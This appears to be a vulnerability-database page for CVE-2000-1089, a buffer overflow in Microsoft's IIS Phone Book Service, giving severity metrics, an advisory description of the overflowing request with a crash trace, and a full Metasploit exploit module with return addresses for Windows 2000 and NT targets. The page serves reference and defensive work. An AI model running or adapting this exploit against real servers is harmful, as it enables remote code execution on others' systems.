CVE-2000-1089 : Detail

CVE-2000-1089

96.97%V3
Network
2001-01-22 04:00 +00:00
2005-11-02 09:00 +00:00


Descriptions

Buffer overflow in Microsoft Phone Book Service allows local users to execute arbitrary commands, aka the "Phone Book Service Buffer Overflow" vulnerability.

Information

Metrics

Metric Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile therefore lets you compare the EPSS score of one CVE with that of all other CVEs.

Exploit information

Exploit Database EDB-ID : 16357

Publication date : 2010-04-29 22:00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: ms00_094_pbserver.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft IIS Phone Book Service Overflow',
            'Description'    => %q{
                This is an exploit for the Phone Book Service /pbserver/pbserver.dll
                described in MS00-094. By sending an overly long URL argument for phone
                book updates, it is possible to overwrite the stack.

                This module has only been tested against Windows 2000 SP1.
            },
            'Author'         => [ 'patrick' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 9179 $',
            'References'     =>
                [
                    [ 'CVE', '2000-1089' ],
                    [ 'OSVDB', '463' ],
                    [ 'BID', '2048' ],
                    [ 'MSB', 'MS00-094' ],
                ],
            'Privileged'     => false,
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                },
            'Payload'        =>
                {
                    'Space'           => 896,
                    'BadChars'        => "\x00\x0a\x0d\x20%&=?",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    ['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll
                    ['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll
                    ['Windows NT SP6',   { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll
                ],
            'DisclosureDate' => 'Dec 04 2000',
            'DefaultTarget'  => 0))

        register_options(
            [
                OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]),
            ], self.class)
    end

    # A 400 response from the ISAPI path is taken as the fingerprint of a live pbserver.dll.
    def check
        print_status("Requesting the vulnerable ISAPI path...")
        res = send_request_raw({ 'uri' => datastore['URL'] }, 5)
        if (res and res.code == 400)
            return Exploit::CheckCode::Vulnerable
        end
        return Exploit::CheckCode::Safe
    end

    def exploit
        print_status("Sending overflow...")
        res = send_request_raw({
            'uri' => datastore['URL'] + '?&&&&&&pb=' + payload.encoded +
                [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)
        }, 5)
        handler
    end

end
Exploit Database EDB-ID : 20460

Publication date : 2000-12-03 23:00 +00:00
Author : Alberto Solino
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2048/info

The Phone Book Service is an optional component that ships with the NT 4 Option Pack and Windows 2000. It is not installed by default. A buffer overflow vulnerability was discovered in the URL processing routines of the Phone Book Service requests on IIS 4 and IIS 5. If exploited, this vulnerability allows an attacker to execute arbitrary code and obtain a remote command shell with the privileges of the IUSR_machinename account (IIS 4) or the IWAM_machinename account (IIS 5).

The Phone Book server services requests using Internet Information Services 5.0 with URIs such as http://hostname/pbserver/

According to Microsoft's documentation a DLL (PBSERVER.DLL) is exported and the services can be used by making requests with the following format:

http://hostname/pbserver/pbserver.dll?osarch=&ostype=&osver=&cmver=&lcid=&pbver=&pb=

The DLL checks the total length to ensure that the request does not exceed 1024 bytes; however, it is possible to overflow a local variable of fixed length in the DLL by sending a request of the following form:

GET /pbserver/pbserver.dll?&&&&&&pb=AAAAAA... (less than 980 chars) HTTP/1.0\n\n

The result is an exception reported in the Event log with source WAM like the following:

The HTTP server encountered an unhandled exception while processing the ISAPI Application '
+ 0x41414143
+ 0x41414139
pbserver!HttpExtensionProc + 0x1C
wam!DllGetClassObject + 0x808
RPCRT4!NdrServerInitialize + 0x4DB
RPCRT4!NdrStubCall2 + 0x586
RPCRT4!CStdStubBuffer_Invoke + 0xC1
ole32!StgGetIFillLockBytesOnFile + 0x116EC
ole32!StgGetIFillLockBytesOnFile + 0x12415
ole32!DcomChannelSetHResult + 0xDF0
ole32!DcomChannelSetHResult + 0xD35
ole32!StgGetIFillLockBytesOnFile + 0x122AD
ole32!StgGetIFillLockBytesOnFile + 0x1210A
ole32!StgGetIFillLockBytesOnFile + 0x11E22
RPCRT4!NdrServerInitialize + 0x745
RPCRT4!NdrServerInitialize + 0x652
RPCRT4!NdrServerInitialize + 0x578
RPCRT4!RpcSmDestroyClientContext + 0x9E
RPCRT4!NdrConformantArrayFree + 0x8A5
RPCRT4!NdrConformantArrayFree + 0x3FC
RPCRT4!RpcBindingSetOption + 0x395
RPCRT4!RpcBindingSetOption + 0x18E
RPCRT4!RpcBindingSetOption + 0x4F8
KERNEL32!CreateFileA + 0x11B

For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp.

By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL, allowing the execution of arbitrary code as user GUEST on the vulnerable machine.

Products Mentioned

Configuration 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_nt >> Version 4.0

References

http://www.securityfocus.com/bid/2048
Tags : vdb-entry, x_refsource_BID
http://www.stake.com/research/advisories/2000/a120400-1.txt
Tags : vendor-advisory, x_refsource_ATSTAKE